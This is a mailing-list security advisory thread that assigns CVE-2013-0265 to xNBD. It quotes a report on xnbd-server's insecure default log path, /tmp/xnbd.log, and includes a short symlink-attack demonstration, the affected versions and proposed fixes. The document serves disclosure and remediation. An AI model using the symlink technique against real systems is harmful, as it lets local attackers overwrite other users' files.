Re: CVE request: Insecure default log file path in xNBD

[Kurt Seifried <kseifried () redhat com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 02/06/2013 09:48 AM, Sebastian Pipping wrote:
> Hello oss-security!
>
>
> Target software ===============
>
> xNBD upstream https://bitbucket.org/hirofuchi/xnbd
>
> Official Debian packages 
> http://packages.debian.org/sid/xnbd-server
>
>
> Description ===========
>
> xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log 
> for logging when parameter --daemonize (and no --logpath FILE) is
> given.
>
> The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so
> there is a vulnerability against symlinks attacks.
>
>
> Demonstration =============
>
> Here is an exploitation example:
>
> $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
>
> $ touch DISK $ truncate --size=$((100*1024**2)) DISK
>
> $ /usr/sbin/xnbd-server --daemonize --target DISK 
> xnbd-server(12462) msg: daemonize enabled xnbd-server(12462) msg:
> cmd target mode xnbd-server(12462) msg: disk DISK size 104857600 B
> (100 MB) xnbd-server(12462) msg: xnbd master initialization done 
> xnbd-server(12462) msg: logfile /tmp/xnbd.log
>
> $ ls -l ~/ATTACK_TARGET -rw------- 1 user123 user123 653 Feb  1
> 16:41 \ /home/user123/ATTACK_TARGET
>
>
> Affected versions =================
>
> The latest code in the upstream Mercurial repository is not
> affected since it does not use logging to /tmp/xnbd.log (or any
> default location) any more.
>
> ----------------------------------------------------------------------
Version                        Status
> ----------------------------------------------------------------------
0.0.x                          not analyzed
> 0.1.0-pre                      VULNERABLE (xnbd-server only) 
> 0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and
> -wrapper) Mercurial tip                  not vulnerable 
> ----------------------------------------------------------------------
>
>
>
> Options for a fix =================
>
> a) Use syslog with --daemonize and no default file location in
> general (i.e. what upstream did)
>
> b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log for
> the hard-coded defaults
>
> c) Replace flag O_APPEND by O_EXCL  (secure but reducing
> functionality)
>
> The attached patch applies approach (b) to version 
> 0.1.0-pre-hg20-e75b93a47722.
>
>
> Best,
>
>
>
> Sebastian

Please use CVE-2013-0265  for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJREyICAAoJEBYNRVNeJnmTL1MQAKARq2UGnD671ZfOdM2COAdP
cQkAT8VD9mBIm1ybe2YwQ0vqpoflOdpIhoW9CsQvvtb3FvDC60kM/2nnAMBv3Ujp
HgLquNw1wtnzIO3M2N/qfpYtYVoBxHB9TSwBsXMyinJtgg4zjYwjkuflE4Ko6rgr
dQ2jjAESgeIGZPWkUGcfRJsZGagO5PGIIv3FWgfsOR+M9dkkN+jdY/fGqCqp+NlP
8UbCdwYEJG73aHn+sI7wEGlpKCsuJzOCFo8FBc8C6N3DpvwFZbyRh45DGVhS3D9k
cNIES1RNmjwsdBsW0k9cQfP+YCTmR6O3IT/3ruXIalF15hkoIkeJT4/y+1gMqWnQ
kfqcDqcCFiezMCvhB0WDNp0OnJAfrcjfleZhNcathImxZqENfcaWpwI5OnIPRwLJ
asn5Og54RdRL4QZsBHLb7cSSNQyeoNRBsdAqz8tQGoZ5DIX22prMCSjrJ4jUnJWg
HCD0Z/xCO4ZAp6lU+Sf4nfYTbent5xBgH1ap88IRFbOEriZisqS14fnsA6++jQZs
dtr6yDoMlvCwlIwAxkMeUz5JLTRI6zWlHpe/doIyEoxjmr18GKx1OPExr0LzetzI
qB9TN4oWTHyhotPdkidlFQ4lXM4HTmYmoI+wF9rE1ulnGIqUTZpWffkzItX2pbaO
HLOXt5NW5Y+8xWz0l6Of
=L+gz
-----END PGP SIGNATURE-----